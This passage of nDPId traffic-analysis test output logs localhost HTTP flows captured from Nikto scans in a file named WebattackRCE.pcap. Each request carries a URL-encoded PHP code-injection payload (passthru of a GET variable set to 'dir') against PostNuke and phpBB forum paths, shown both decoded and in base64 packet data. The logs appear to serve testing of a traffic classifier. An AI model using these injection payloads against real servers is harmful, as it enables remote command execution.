+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} 
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
